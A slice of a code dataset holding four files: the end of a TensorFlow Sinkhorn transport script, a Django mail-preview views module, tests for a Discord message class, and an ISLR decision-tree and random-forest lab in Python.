optimizer.apply_gradients(masked_gvs)\n\n sess.run(tf.global_variables_initializer())\n\n\n with FFMPEG_VideoWriter('out.mp4', (VIDEO_SIZE, VIDEO_SIZE), 30.0) as video:\n for indx in range(minibatch_rounds):\n ids = np.random.choice(n, bs, replace=False)\n mask_np = np.zeros((n, d))\n mask_np[ids, :] = 1\n sess.run(train_step, feed_dict={mask: mask_np})\n\n next_pos_np = sess.run(pos)\n # frame = sinkhorn.draw_points(next_pos_np, VIDEO_SIZE)\n # frame = sinkhorn.draw_edges(next_pos_np[next_pos_np[:, 0].argsort()], target_np[target_np[:, 0].argsort()], VIDEO_SIZE)\n\n if do_rematching:\n matching = optimalMatching(next_pos_np, target_np)\n target_np_aligned = target_np[matching]\n else:\n target_np_aligned = target_np\n\n draw_edges = do_initial_matching or do_rematching\n frame = sinkhorn.draw_edges(next_pos_np, target_np_aligned, VIDEO_SIZE, edges=draw_edges)\n video.write_frame(frame)\n\n print(\"iter:\", indx, \"transport:\", sess.run(OT), \"mean_length_of_matching:\",\n np.mean(np.linalg.norm(next_pos_np - target_np_aligned, axis=1)))\n print(np.mean(next_pos_np[:, :4], axis=0), \"\\n\", np.cov(next_pos_np[:, :4].T))\n\nmain()\n", "sub_path": "sinkhorn_batch_test.py", "file_name": "sinkhorn_batch_test.py", "file_ext": "py", "file_size_in_byte": 4809, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "numpy.sum", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 24, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 26, "usage_type": "call"}, {"api_name": "networkx.algorithms.matching.max_weight_matching", "line_number": 32, "usage_type": "call"}, {"api_name": "networkx.algorithms", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 45, "usage_type": "call"}, {"api_name": 
"numpy.meshgrid", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 87, "usage_type": "attribute"}, {"api_name": "sinkhorn.pdist", "line_number": 89, "usage_type": "call"}, {"api_name": "sinkhorn.Sinkhorn", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 96, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 103, "usage_type": "call"}, {"api_name": "moviepy.video.io.ffmpeg_writer.FFMPEG_VideoWriter", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 109, "usage_type": "call"}, {"api_name": "sinkhorn.draw_edges", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 128, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "230720868", "text": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import redirect\nfrom django.conf import settings\nfrom django.http import Http404, HttpResponse\nfrom django.views.generic import TemplateView, FormView\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom mail_factory import factory\n\n\nclass MailListView(TemplateView):\n \"\"\"Return a list of mails.\"\"\"\n template_name = 'mail_factory/list.html'\n\n def get_context_data(self, **kwargs):\n \"\"\"Return object_list.\"\"\"\n data = super(MailListView, self).get_context_data(**kwargs)\n mail_list = []\n \n for mail_name, mail_class in sorted(factory.mail_map.items(), key=lambda x: x[0]):\n mail_list.append((mail_name, 
mail_class.__name__))\n        data['mail_map'] = mail_list\n        return data\n\n\nclass MailFormView(FormView):\n    template_name = 'mail_factory/form.html'\n\n    def dispatch(self, request, mail_name):\n        self.mail_name = mail_name\n        if self.mail_name not in factory.mail_map:\n            raise Http404\n\n        self.raw = 'raw' in request.POST\n        self.send = 'send' in request.POST\n        self.email = request.POST.get('email')\n\n        return super(MailFormView, self).dispatch(request)\n\n    def get_form_class(self):\n        return factory._get_mail_form(self.mail_name)\n\n    def form_valid(self, form):\n        if self.raw:\n            return HttpResponse('<pre>%s</pre>' %\n                                factory.get_raw_content(self.mail_name,\n                                                        [settings.DEFAULT_FROM_EMAIL],\n                                                        form.cleaned_data).message())\n        elif self.send:\n            factory.mail(self.mail_name, [self.email], form.cleaned_data)\n            messages.success(self.request,\n                             '%s mail sent to %s' % (self.mail_name,\n                                                     self.email))\n            return redirect('mail_factory_list')\n\n        else:\n            return HttpResponse(\n                factory.get_html_for(self.mail_name, form.cleaned_data))\n\n    def get_context_data(self, **kwargs):\n        data = super(MailFormView, self).get_context_data(**kwargs)\n        try:\n            data['admin_email'] = settings.ADMINS[0][1]\n        except IndexError:\n            data['admin_email'] = getattr(\n                settings, 'SUPPORT_EMAIL',\n                getattr(settings, 'DEFAULT_FROM_EMAIL', ''))\n\n        return data\n\n\nmail_list = login_required(MailListView.as_view())\nform = login_required(MailFormView.as_view())\n", "sub_path": "mail_factory/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2560, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "django.views.generic.TemplateView", "line_number": 12, "usage_type": "name"}, {"api_name": "mail_factory.factory.mail_map.items", "line_number": 21, "usage_type": "call"}, {"api_name": "mail_factory.factory.mail_map", "line_number": 21, "usage_type": "attribute"}, {"api_name": "mail_factory.factory", "line_number": 21, "usage_type": "name"}, {"api_name": "django.views.generic.FormView", "line_number": 27, "usage_type": "name"}, {"api_name": "mail_factory.factory.mail_map", "line_number": 32, "usage_type": "attribute"}, {"api_name": "mail_factory.factory", "line_number": 32, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 33, "usage_type": "name"}, {"api_name": "mail_factory.factory._get_mail_form", "line_number": 42, "usage_type": "call"}, {"api_name": "mail_factory.factory", "line_number": 42, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 46, "usage_type": "call"}, {"api_name": "mail_factory.factory.get_raw_content", "line_number": 47, "usage_type": "call"}, {"api_name": "mail_factory.factory", "line_number": 47, "usage_type": "name"}, {"api_name": "django.conf.settings.DEFAULT_FROM_EMAIL", "line_number": 48, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 48, "usage_type": "name"}, {"api_name": "mail_factory.factory.mail", "line_number": 51, "usage_type": "call"}, {"api_name": "mail_factory.factory", "line_number": 51, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 52, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 52, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 55, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 58, "usage_type": "call"}, {"api_name": "mail_factory.factory.get_html_for", "line_number": 59, "usage_type": "call"}, {"api_name": "mail_factory.factory", "line_number": 59, "usage_type": "name"}, {"api_name": "django.conf.settings.ADMINS", "line_number": 64, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 64, "usage_type": "name"}, {"api_name": "django.conf.settings", "line_number": 67, "usage_type": "argument"}, {"api_name": "django.conf.settings", "line_number": 68, "usage_type": "argument"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 73, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 74, 
"usage_type": "call"}]} +{"seq_id": "579510860", "text": "from discord import Message\nimport datetime\nfrom collections import namedtuple\nimport json\n\n\nMockPayload = namedtuple(\"Payload\", [\"data\"])\n\n\ndef test_from_payload():\n payload = MockPayload({\n \"content\": \"hello\",\n \"channel_id\": \"my_channel_id123\",\n \"author\": {\n \"id\": \"1234\",\n \"username\": \"Django\",\n \"discriminator\": \"#1235\"\n },\n \"timestamp\": datetime.datetime.now(),\n \"mentions\": []\n })\n\n message = Message.from_payload(payload)\n\n assert isinstance(message, Message)\n assert message.content == payload.data[\"content\"]\n assert message.channel_id == payload.data[\"channel_id\"]\n assert message.author_id == payload.data[\"author\"][\"id\"]\n assert message.username == payload.data[\"author\"][\"username\"] + \"#\" + payload.data[\"author\"][\"discriminator\"]\n assert message.timestamp == payload.data[\"timestamp\"]\n\n\ndef test_to_payload():\n payload = MockPayload({\n \"content\": \"hello\",\n \"channel_id\": \"my_channel_id123\",\n \"author\": {\n \"id\": \"1234\",\n \"username\": \"Django\",\n \"discriminator\": \"#1235\"\n },\n \"timestamp\": datetime.datetime.now(),\n \"mentions\": []\n })\n\n message = Message.from_payload(payload)\n new_payload = message.to_payload()\n\n assert new_payload[\"content\"] == payload.data[\"content\"]\n assert new_payload[\"tts\"] == False\n assert new_payload[\"embed\"] == message.embed\n\n\ndef test_to_json():\n payload = MockPayload({\n \"content\": \"hello\",\n \"channel_id\": \"my_channel_id123\",\n \"author\": {\n \"id\": \"1234\",\n \"username\": \"Django\",\n \"discriminator\": \"#1235\"\n },\n \"timestamp\": datetime.datetime.now(),\n \"mentions\": []\n })\n\n message = Message.from_payload(payload)\n payload = message.to_payload()\n\n json_payload = message.to_json()\n\n reconstructed = json.loads(json_payload)\n\n assert payload == reconstructed\n", "sub_path": "tests/discord/message_test.py", "file_name": "message_test.py", "file_ext": "py", "file_size_in_byte": 2000, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "collections.namedtuple", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "attribute"}, {"api_name": "discord.Message.from_payload", "line_number": 23, "usage_type": "call"}, {"api_name": "discord.Message", "line_number": 23, "usage_type": "name"}, {"api_name": "discord.Message", "line_number": 25, "usage_type": "argument"}, {"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "attribute"}, {"api_name": "discord.Message.from_payload", "line_number": 46, "usage_type": "call"}, {"api_name": "discord.Message", "line_number": 46, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "attribute"}, {"api_name": "discord.Message.from_payload", "line_number": 67, "usage_type": "call"}, {"api_name": "discord.Message", "line_number": 67, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "460027696", "text": "# -----------------------------------------\n# Chapter 8 - Lab: Decision Trees\n# -----------------------------------------\n\n\n#%% 
-----------------------------------------\n# Import packages\n# -------------------------------------------\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport os\n\n# Regression libs\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn import tree\nfrom sklearn.metrics import confusion_matrix, mean_squared_error, make_scorer\nimport sklearn.ensemble as ens\n\nimport graphviz\n\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn.metrics import roc_curve, roc_auc_score\nfrom sklearn.metrics import make_scorer, mean_squared_error\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.utils import resample\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nfrom sklearn.base import BaseEstimator, RegressorMixin\n\nimport itertools\nimport time\n\n\n#%% -----------------------------------------\n# Settings\n# -------------------------------------------\n\n# Set working directory\nos.getcwd()\nos.chdir('/Users/viktor.eriksson2/Documents/python_files/miscellanious/stanford-statistical-learning')\nos.getcwd()\n\n# Plot settings\nsns.set()\n\n\n#%% -----------------------------------------\n# Load data\n# -------------------------------------------\n\n# Datasets from ISLR\ncarseats = pd.read_csv('data/carseats.csv')\ncarseats.info()\ncarseats.head(10)\n\nboston = pd.read_csv('data/boston.csv')\nboston.info()\nboston.head(10)\n\n\n#%% -----------------------------------------\n# Functions\n# -------------------------------------------\n\n\n#%% -----------------------------------------\n# Data prepping\n# -------------------------------------------\n\n#######################\n# Carseats dataset\n#######################\n\n# Check null values\ncarseats.isna().sum()\n\n# Plot distribution of Sales variable\nplt.figure(figsize=(10, 7))\nsns.distplot(carseats['Sales'])\n\n# Mean and median of Sales variable\ncarseats['Sales'].mean()\ncarseats['Sales'].median()\n\n# Create binary variable indicating if Sales are high or not\n# carseats['high'] = [0 if x <= 8 else 1 for x in carseats['Sales']]\ncarseats['high'] = carseats['Sales'].map(lambda x: 0 if x <= 8 else 1)\ncarseats.head(10)\n\n# Create dummy variables for categorical predictors\ndummies = pd.get_dummies(carseats[['ShelveLoc', 'Urban', 'US']])\n\n# Create new dataframe with predictors and response\ny = carseats[['high']]\nX_ = carseats.drop(columns=['Sales', 'high', 'ShelveLoc', 'Urban', 'US'])\nX = pd.concat([X_, dummies[['ShelveLoc_Bad', 'ShelveLoc_Good', 'ShelveLoc_Medium', 'Urban_Yes', 'US_Yes']]], axis=1)\n\n# Pairplot\nplt.figure(figsize=(10, 7))\nsns.pairplot(pd.concat([y, X], axis=1), hue='high')\n\n#######################\n# Boston dataset\n#######################\n\n# Check null values\nboston.isna().sum()\n\n# Pairplot\nplt.figure(figsize=(10, 7))\nsns.pairplot(boston)\n\n\n#%% -----------------------------------------\n# Fitting classification trees\n# -------------------------------------------\n\n# Split data into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=1)\n\n# Fit tree classifier\nclf_tree = tree.DecisionTreeClassifier(max_depth=6).fit(X_train, y_train)\n\n# Score\nclf_tree.score(X_train, y_train)\nclf_tree.score(X_test, y_test)\n\n# Confusion matrix\ncnf_mat = confusion_matrix(y_test, clf_tree.predict(X_test))\ncnf_mat[1,1]/cnf_mat[:,1].sum() # true positive rate\ncnf_mat[1,0]/cnf_mat[:,0].sum() # false positive rate\nnp.diag(cnf_mat).sum()/cnf_mat.sum() # classification rate\n\nclf_tree.tree_.node_count\nclf_tree.tree_.max_depth\n\n# Visualize\ndot_data = tree.export_graphviz(clf_tree, out_file=None,\n                           feature_names=X_train.columns, \n                           class_names=['0', '1'], \n                           filled=True, rounded=True)\n\ngraph = graphviz.Source(dot_data)\ngraph\n# display(HTML(graph._repr_svg_()))\n\n# Plot most important features in model\nplt.figure(figsize=(10, 7))\nsns.barplot(x='importance', y='feature', data=pd.DataFrame({\n    'feature': X.columns, 'importance': clf_tree.feature_importances_\n}).sort_values(['importance'], ascending=False), color='b')\n\n\n#######################\n# Tree pruning\n#######################\n\nclf_pr = tree.DecisionTreeClassifier()\npath = clf_pr.cost_complexity_pruning_path(X_train, y_train)\nccp_alphas, impurities = path.ccp_alphas, path.impurities\n\nplt.figure(figsize=(10, 7))\nsns.lineplot(x=ccp_alphas[:-1], y=impurities[:-1])\nplt.xlabel('effective alpha')\nplt.ylabel('total impurity of leaves')\nplt.title('Total Impurity vs effective alpha for training set')\n\nclfs = []\nRMSe = []\n\nfor a in ccp_alphas:\n    clf = tree.DecisionTreeClassifier(ccp_alpha=a)\n    \n    # Cross validation\n    scores = cross_val_score(clf, X_train, y_train, cv=7)\n    rmse = np.mean(scores)\n    ci = np.std(scores)*1.96\n\n    # Fit to train data\n    clf.fit(X_train, y_train)\n    no_nodes = clf.tree_.node_count\n\n    # Predict on test data\n    y_pred = clf.predict(X_test)\n    test_mse = mean_squared_error(y_test, y_pred)\n\n    # Save results\n    RMSe += [[rmse, rmse+ci, rmse-ci, test_mse, no_nodes, a]]\n    clfs.append(clf)\n    \n\nclfs\nRMSe\n\nprint('Number of nodes in the last tree is: {} with ccp_alpha: {}'.format(\n    clfs[-1].tree_.node_count, ccp_alphas[-1]))\n\nclfs[-1].tree_.max_depth\n\n# Plot results\nplt.figure(figsize=(10, 7))\nplt.subplot(3, 1, 1)\nsns.lineplot(x=ccp_alphas[:-1], y=[x.tree_.node_count for x in clfs[:-1]])\nplt.xlabel('alphas')\nplt.ylabel('nr of nodes')\n\nplt.subplot(3, 1, 2)\nsns.lineplot(x=ccp_alphas[:-1], y=[x.tree_.max_depth for x in clfs[:-1]])\nplt.xlabel('alphas')\nplt.ylabel('depth of tree')\n\nplt.subplot(3, 1, 3)\nsns.lineplot(x=ccp_alphas[:-1], y=pd.DataFrame(RMSe).iloc[:-1,0])\nplt.xlabel('alphas')\nplt.ylabel('MSE')\n\n# Plot MSE against number of nodes\nplt.figure(figsize=(10, 7))\nsns.lineplot(x=[x.tree_.node_count for x in clfs[:-1]], y=pd.DataFrame(RMSe).iloc[:-1,0], label='MSE')\nsns.lineplot(x=[x.tree_.node_count for x in clfs[:-1]], y=pd.DataFrame(RMSe).iloc[:-1,1], label='CI upper')\nsns.lineplot(x=[x.tree_.node_count for x in clfs[:-1]], y=pd.DataFrame(RMSe).iloc[:-1,2], label='CI lower')\nplt.xlabel('nr of nodes')\nplt.ylabel('MSE')\n\ntrain_scores = [clf.score(X_train, y_train) for clf in clfs]\ntest_scores = [clf.score(X_test, y_test) for clf in clfs]\n\nplt.figure(figsize=(10, 7))\nsns.lineplot(x=ccp_alphas[:-1], y=[x.score(X_train, y_train) for x in clfs[:-1]], label='train')\nsns.lineplot(x=ccp_alphas[:-1], y=[x.score(X_test, y_test) for x in clfs[:-1]], label='test')\nplt.xlabel('alphas')\nplt.ylabel('accuracy')\n\n# Min MSE\nMSE_df = pd.DataFrame(RMSe)\nMSE_df[MSE_df.iloc[:,0] == MSE_df.iloc[:,0].min()]\n\n# Tree corresponding to smallest MSE\nopt_clf = clfs[388]\nopt_clf.fit(X_train, y_train)\nopt_clf.tree_.max_depth\nopt_clf.tree_.node_count\n\ny_pred = opt_clf.predict(X_test)\nnp.sqrt(mean_squared_error(y_test, y_pred)) # ~3.49\n\"\"\"\nThis means that the optimal model from our training set yields a model which 
\nindicates that this model leads to test predictions that are within \n$3,490 of the true median home value for the suburb.\n\"\"\"\n\n\n#%% -----------------------------------------\n# Fitting regression trees\n# -------------------------------------------\n\n# Split data into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(boston.drop(columns=['medv']), boston[['medv']], test_size=0.1, random_state=1)\n\n# Fit regression tree\nregr_tree = tree.DecisionTreeRegressor(max_depth=6).fit(X_train, y_train)\n\n# Prediction\ny_pred = regr_tree.predict(X_test)\n\n# Root mean-square-error\nrmse = np.sqrt(mean_squared_error(y_test, y_pred))\nprint('RMSE test: {}'.format(np.round(rmse, 2)))\n\n# Visualise the tree with GraphViz\ndot_data = tree.export_graphviz(regr_tree, out_file=None,\n feature_names=X_train.columns, \n filled=True, rounded=True)\ngraph = graphviz.Source(dot_data)\ngraph\n\nregr_tree.tree_.node_count\nregr_tree.tree_.max_depth\n\n#######################\n# Tree pruning\n#######################\n\nregr_pr = tree.DecisionTreeRegressor()\npath = regr_pr.cost_complexity_pruning_path(X_train, y_train)\nccp_alphas, impurities = path.ccp_alphas, path.impurities\n\nplt.figure(figsize=(10, 7))\nsns.lineplot(x=ccp_alphas[:-1], y=impurities[:-1])\nplt.xlabel('effective alpha')\nplt.ylabel('total impurity of leaves')\nplt.title('Total Impurity vs effective alpha for training set')\n\nclfs = []\nRMSe = []\n\nmse = make_scorer(mean_squared_error)\n\nfor a in ccp_alphas:\n clf = tree.DecisionTreeRegressor(ccp_alpha=a)\n \n # Cross validation\n scores = cross_val_score(clf, X_train, y_train, cv=7, scoring=mse)\n rmse = np.mean(scores)\n ci = np.std(scores)*1.96\n\n # Fit to train data\n clf.fit(X_train, y_train)\n no_nodes = clf.tree_.node_count\n\n # Predict on test data\n y_pred = clf.predict(X_test)\n test_mse = mean_squared_error(y_test, y_pred)\n\n # Save results\n RMSe += [[rmse, rmse+ci, rmse-ci, test_mse, no_nodes, a]]\n clfs.append(clf)\n\nclfs\nRMSe\n\nprint('Number of nodes in the last tree is: {} with ccp_alpha: {}'.format(\n clfs[-1].tree_.node_count, ccp_alphas[-1]))\n\nclfs[-1].tree_.max_depth\n\n# Plot results\nplt.figure(figsize=(10, 7))\nplt.subplot(3, 1, 1)\nsns.lineplot(x=ccp_alphas, y=[x.tree_.node_count for x in clfs])\nplt.xlabel('alphas')\nplt.ylabel('nr of nodes')\n\nplt.subplot(3, 1, 2)\nsns.lineplot(x=ccp_alphas, y=[x.tree_.max_depth for x in clfs])\nplt.xlabel('alphas')\nplt.ylabel('depth of tree')\n\nplt.subplot(3, 1, 3)\nsns.lineplot(x=ccp_alphas, y=pd.DataFrame(RMSe).iloc[:,0])\nplt.xlabel('alphas')\nplt.ylabel('MSE')\n\n# Plot MSE against number of nodes\nplt.figure(figsize=(10, 7))\nsns.lineplot(x=[x.tree_.node_count for x in clfs], y=pd.DataFrame(RMSe).iloc[:,0], label='cross-validation')\nsns.lineplot(x=[x.tree_.node_count for x in clfs], y=pd.DataFrame(RMSe).iloc[:,1], label='CI upper')\nsns.lineplot(x=[x.tree_.node_count for x in clfs], y=pd.DataFrame(RMSe).iloc[:,2], label='CI lower')\nplt.xlabel('nr of nodes')\nplt.ylabel('MSE')\n\ntrain_scores = [clf.score(X_train, y_train) for clf in clfs]\ntest_scores = [clf.score(X_test, y_test) for clf in clfs]\n\nplt.figure(figsize=(10, 7))\nsns.lineplot(x=ccp_alphas, y=[x.score(X_train, y_train) for x in clfs], label='train')\nsns.lineplot(x=ccp_alphas, y=[x.score(X_test, y_test) for x in clfs], label='test')\nplt.xlabel('alphas')\nplt.ylabel('accuracy')\n\n# Min MSE\nMSE_df = pd.DataFrame(RMSe)\nMSE_df[MSE_df.iloc[:,0] == MSE_df.iloc[:,0].min()]\n\"\"\"\nWe have two trees with the same MSE. 
We pick the one with the least\nnumber of nodes\n\"\"\"\n\n# Tree corresponding to smallest MSE\nopt_clf = clfs[388]\nopt_clf.fit(X_train, y_train)\nopt_clf.tree_.max_depth\nopt_clf.tree_.node_count\n\ny_pred = opt_clf.predict(X_test)\nnp.sqrt(mean_squared_error(y_test, y_pred)) # ~3.49\n\"\"\"\nThis means that the optimal model from our training set yields a model which \nindicates that this model leads to test predictions that are within \n$3,490 of the true median home value for the suburb.\n\"\"\"\n\n\n#%% -----------------------------------------\n# Bagging and random forest\n# -------------------------------------------\n\n# Split data into training and test sets\nX = boston.drop(columns=['medv'])\ny = boston[['medv']]\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=1)\n\n# Bagging regression. Same as random forest but all predictors are used\nregr_bg = ens.RandomForestRegressor(max_features=X_train.shape[1], n_estimators=100, random_state=0).fit(X_train, y_train)\n\n# Prediction\ny_pred = regr_bg.predict(X_test)\n\nprint('The MSE is: {}'.format(mean_squared_error(y_test, y_pred)))\nprint('The RMSE is: {}'.format(np.sqrt(mean_squared_error(y_test, y_pred))))\n\"\"\"\nBagging significantly improves the RMSE\n\"\"\"\n\n# Random forest with 6 predictors\nregr_rf = ens.RandomForestRegressor(max_features=6, n_estimators=100, random_state=0).fit(X_train, y_train)\n\n# Prediction\ny_pred = regr_rf.predict(X_test)\n\nprint('The MSE is: {}'.format(mean_squared_error(y_test, y_pred)))\nprint('The RMSE is: {}'.format(np.sqrt(mean_squared_error(y_test, y_pred))))\n\"\"\"\nRandom forest yields slightly higher results than bagging but almost the same\n\"\"\"\n\n# Compare different forest algorithms\nresults = []\n\nfor i in np.arange(2, 101):\n # Tree algorithms\n regr_bg = ens.RandomForestRegressor(max_features=X_train.shape[1], n_estimators=100, oob_score=True, max_leaf_nodes=i)\n regr_rf1 = ens.RandomForestRegressor(max_features=4, n_estimators=100, oob_score=True, max_leaf_nodes=i)\n regr_rf2 = ens.RandomForestRegressor(max_features=6, n_estimators=100, oob_score=True, max_leaf_nodes=i)\n\n # Fit models\n fit_bg = regr_bg.fit(X_train, y_train)\n fit_rf1 = regr_rf1.fit(X_train, y_train)\n fit_rf2 = regr_rf2.fit(X_train, y_train)\n\n # Predictions\n pred_bg = fit_bg.predict(X_test)\n pred_rf1 = fit_rf1.predict(X_test)\n pred_rf2 = fit_rf2.predict(X_test)\n\n # MSE\n mse_bg = mean_squared_error(y_test, pred_bg)\n mse_rf1 = mean_squared_error(y_test, pred_rf1)\n mse_rf2 = mean_squared_error(y_test, pred_rf2)\n\n # OOBs\n oob_bg = fit_bg.oob_score_\n oob_rf1 = fit_rf1.oob_score_\n oob_rf2 = fit_rf2.oob_score_\n\n # Results\n results += [[i, mse_bg, mse_rf1, mse_rf2, oob_bg, oob_rf1, oob_rf2]]\n\nres_df = pd.DataFrame(results, columns=['no_leafs', 'mse_bg', 'mse_rf1', 'mse_rf2', 'oob_bg', 'oob_rf1', 'oob_rf2'])\n\n# Plot results\nplt.figure(figsize=(10,7))\nplt.subplot(2, 1, 1)\nsns.lineplot(x='no_leafs', y='mse_bg', data=res_df, label='bagging')\nsns.lineplot(x='no_leafs', y='mse_rf1', data=res_df, label='random forest m=4')\nsns.lineplot(x='no_leafs', y='mse_rf2', data=res_df, label='random forest m=6')\nplt.ylabel('MSE')\n\nplt.subplot(2, 1, 2)\nsns.lineplot(x='no_leafs', y='oob_bg', data=res_df, label='bagging')\nsns.lineplot(x='no_leafs', y='oob_rf1', data=res_df, label='random forest m=4')\nsns.lineplot(x='no_leafs', y='oob_rf2', data=res_df, label='random forest m=6')\nplt.ylabel('OOB score')\n\"\"\"\nTrying different sizes of training data will give 
different results.\nFor a larger training set, bagging seems to perform better.\nFor smaller training sets, random forest might be a better option.\n\nIt looks like about 20 leaves gives a good enough prediction\n\"\"\"\n\n# Plot most important features for each model\nfit_bg = ens.RandomForestRegressor(max_features=X_train.shape[1], n_estimators=100, oob_score=True, max_leaf_nodes=20).fit(X_train, y_train)\nfit_rf1 = ens.RandomForestRegressor(max_features=4, n_estimators=100, oob_score=True, max_leaf_nodes=20).fit(X_train, y_train)\nfit_rf2 = ens.RandomForestRegressor(max_features=6, n_estimators=100, oob_score=True, max_leaf_nodes=20).fit(X_train, y_train)\n\nplt.figure(figsize=(10, 15))\nplt.subplot(3, 1, 1)\nsns.barplot(x='importance', y='feature', data=pd.DataFrame({\n    'feature': X.columns, 'importance': fit_bg.feature_importances_\n}).sort_values(['importance'], ascending=False), color='b')\nplt.title('Bagging')\nplt.xlabel('')\n\nplt.subplot(3, 1, 2)\nsns.barplot(x='importance', y='feature', data=pd.DataFrame({\n    'feature': X.columns, 'importance': fit_rf1.feature_importances_\n}).sort_values(['importance'], ascending=False), color='b')\nplt.title('Random forest m=4')\nplt.xlabel('')\n\nplt.subplot(3, 1, 3)\nsns.barplot(x='importance', y='feature', data=pd.DataFrame({\n    'feature': X.columns, 'importance': fit_rf2.feature_importances_\n}).sort_values(['importance'], ascending=False), color='b')\nplt.title('Random forest m=6')\n\n\n# # OOB error rates\n# ensemble_clfs = [\n#     (\"RandomForestClassifier, max_features=13\",\n#         ens.RandomForestClassifier(warm_start=True, oob_score=True,\n#                                max_features=X_train.shape[1],\n#                                random_state=1)),\n#     (\"RandomForestClassifier, max_features=4\",\n#         ens.RandomForestClassifier(warm_start=True, max_features=4,\n#                                oob_score=True,\n#                                random_state=1)),\n#     (\"RandomForestClassifier, max_features=6\",\n#         ens.RandomForestClassifier(warm_start=True, max_features=6,\n#                                oob_score=True,\n#                                random_state=1))\n# ]\n\n# # Map a classifier name to a list of (<n_estimators>, <error rate>) pairs.\n# error_rate = OrderedDict((label, []) for label, _ in ensemble_clfs)\n\n# # Range of `n_estimators` values to explore.\n# min_estimators = 2\n# max_estimators = 13\n# OOBs = pd.DataFrame({\n#     'Bagging': [],\n#     'Random forest 1': [],\n#     'Random forest 2': []\n# })\n\n# OOBs\n\n# for clf in ensemble_clfs:\n#     for i in range(min_estimators, max_estimators + 1):\n#         clf.set_params(n_estimators=i)\n#         clf.fit(X, y)\n\n#         # Record the OOB error for each `n_estimators=i` setting.\n#         oob_error = 1 - clf.oob_score_\n#         pd.DataFrame()\n#         error_rate[label].append((i, oob_error))\n\n\n#%% -----------------------------------------\n# Boosting\n# 